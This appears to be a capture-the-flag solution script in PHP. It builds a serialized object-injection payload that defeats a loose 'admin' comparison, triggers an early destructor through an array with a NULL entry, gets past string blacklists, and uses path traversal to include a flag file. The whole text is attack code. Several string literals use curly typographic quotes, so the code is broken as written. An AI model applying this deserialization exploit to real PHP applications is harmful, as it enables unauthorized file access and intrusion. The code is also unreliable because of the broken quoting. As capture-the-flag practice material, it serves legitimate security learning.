lit

<?php
class User
{
public $username=0;
public $value;
public function exec()
{
$ser = unserialize(serialize(unserialize($this->value)));
if ($ser != $this->value && $ser instanceof Access) {
include($ser->getToken());
}
}
public function __destruct()
{
if ($this->username == “admin”) {
$this->exec();
}
}
}

class Access
{

protected $prefix="/";
protected $suffix="/../flag";

public function getToken()
{
    if (!is_string($this->prefix) || !is_string($this->suffix)) {
        throw new Exception("Go to HELL!");
    }
    $result = $this->prefix . 'lilctf' . $this->suffix;
    if (strpos($result, 'pearcmd') !== false) {
        throw new Exception("Can I have peachcmd?");
    }
    return $result;

}

}

$a=new User();
$a->value=serialize(new Access());
$b=array(0=>$a,1=>NULL);
$ser=urlencode(serialize($b));
echo $ser;
if (strpos($ser, ‘admin’) !== false && strpos($ser, ‘Access”:’) !== false) {
exit (“no way!!!!”);
}

$user = unserialize(urldecode($ser));
throw new Exception(“nonono!!!”);